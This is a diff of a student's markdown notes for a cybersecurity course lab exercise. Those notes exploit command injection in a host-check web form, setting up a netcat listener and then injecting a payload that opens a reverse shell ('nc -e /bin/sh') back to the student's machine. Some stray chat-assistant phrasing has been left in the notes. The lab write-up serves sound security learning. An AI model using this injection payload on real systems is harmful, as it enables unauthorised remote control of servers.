santiagosayshey/DigiBrain/content/Computer Science/Cybersecurity Fundamentals/Assignments/Assignment 4 - Network Attacks & Web Security.md

 > ![[Pasted image 20240502052455.png]]

-You're absolutely right, and I appreciate your patience.
-Let's correct that.
-Here's the revised callout:
+Understood.
+Here's the updated version:

 > [!exercise]+ Exercise 6
 > Go to `http://<Your Hacklab VM IP addr>:8083/doa.php` to get the secret!
 >
-> **My Process:**
+> **Answer:**
 >
-> Suspecting a command injection vulnerability, I navigated to the webpage allowing me to check if a host is dead or alive by entering an IP address.
+> Upon navigating to the webpage and seeing the form allowing me to check if a host is dead or alive by entering an IP address, I suspected a possible command injection vulnerability.
 >
-> Before attempting to exploit the suspected vulnerability, I set up a netcat listener on my local machine using:
+> Before attempting to exploit the vulnerability, I set up a netcat listener on my local machine using:
 >
 > ```
 > nc -lvp 1234
 > ```
 >
-> With the listener in place, I crafted a malicious command instead of a regular IP address.
-I entered:
+> Crafting a malicious command, I entered:
 >
 > ```
 > 127.0.0.1 & nc -e /bin/sh 192.168.117.124 1234